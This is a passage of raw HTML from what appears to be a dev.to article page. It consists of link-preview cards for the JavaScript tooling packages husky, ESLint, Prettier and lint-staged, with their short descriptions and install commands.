class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fstatic-production.npmjs.com%2Fb0f1a8318363185cc2ea6a40ac23eeb2.png" width="32" height="32"> npmjs.com </div> </div> </div> </div> <div class="crayons-card c-embed text-styles text-styles--secondary"> <div class="c-embed__content"> <div class="c-embed__cover"> <a href="https://www.npmjs.com/package/husky" class="c-link align-middle" rel="noopener noreferrer"> <img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fstatic-production.npmjs.com%2F338e4905a2684ca96e08c7780fc68412.png" height="420" class="m-0" width="800"> </a> </div> <div class="c-embed__body"> <h2 class="fs-xl lh-tight"> <a href="https://www.npmjs.com/package/husky" rel="noopener noreferrer" class="c-link"> husky - npm </a> </h2> <p class="truncate-at-3"> Modern native Git hooks. Latest version: 9.1.7, last published: 9 months ago. Start using husky in your project by running `npm i husky`. There are 3245 other projects in the npm registry using husky. </p> <div class="color-secondary fs-s flex items-center"> <img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fstatic-production.npmjs.com%2Fb0f1a8318363185cc2ea6a40ac23eeb2.png" width="32" height="32"> npmjs.com </div> </div> </div> </div> <div class="crayons-card c-embed text-styles text-styles--secondary"> <div class="c-embed__content"> <div class="c-embed__cover"> <a href="https://eslint.org/" class="c-link align-middle" rel="noopener noreferrer"> <img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Feslint.org%2Ficon-512.png" height="512" class="m-0" width="512"> </a> </div> <div class="c-embed__body"> <h2 class="fs-xl lh-tight"> <a href="https://eslint.org/" rel="noopener noreferrer" class="c-link"> Find and fix problems in your JavaScript code - ESLint - Pluggable JavaScript Linter </a> </h2> <p class="truncate-at-3"> A pluggable and configurable linter tool for identifying and reporting on patterns in JavaScript. Maintain your code quality with ease. </p> <div class="color-secondary fs-s flex items-center"> <img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Feslint.org%2Ffavicon.ico" width="48" height="48"> eslint.org </div> </div> </div> </div> <div class="crayons-card c-embed text-styles text-styles--secondary"> <div class="c-embed__content"> <div class="c-embed__cover"> <a href="https://prettier.io/" class="c-link align-middle" rel="noopener noreferrer"> <img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fprettier.io%2Ficon.png" height="256" class="m-0" width="256"> </a> </div> <div class="c-embed__body"> <h2 class="fs-xl lh-tight"> <a href="https://prettier.io/" rel="noopener noreferrer" class="c-link"> Prettier · Opinionated Code Formatter · Prettier </a> </h2> <p class="truncate-at-3"> Opinionated Code Formatter </p> <div class="color-secondary fs-s flex items-center"> <img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fprettier.io%2Ficon.png" width="256" height="256"> prettier.io </div> </div> </div> </div> <div class="crayons-card c-embed text-styles text-styles--secondary"> <div class="c-embed__content"> <div class="c-embed__cover"> <a href="https://www.npmjs.com/package/lint-staged" class="c-link align-middle" rel="noopener noreferrer"> <img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fstatic-production.npmjs.com%2F338e4905a2684ca96e08c7780fc68412.png" height="420" class="m-0" width="800"> </a> </div> <div class="c-embed__body"> <h2 class="fs-xl lh-tight"> <a href="https://www.npmjs.com/package/lint-staged" rel="noopener noreferrer" class="c-link"> lint-staged - npm </a> </h2> <p class="truncate-at-3"> Lint files staged by git. Latest version: 16.1.5, last published: 14 days ago. Start using lint-staged in your project by running `npm i lint-staged`. There are 2182 other projects in the npm registry using lint-staged. </p> <div class="color-secondary fs-s flex items-center"> <img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fstatic-production.npmjs.com%2Fb0f1a8318363185cc2ea6a40ac23eeb2.png" width="32" height="32"> npmjs.com </div> </div> </div> </div> discuss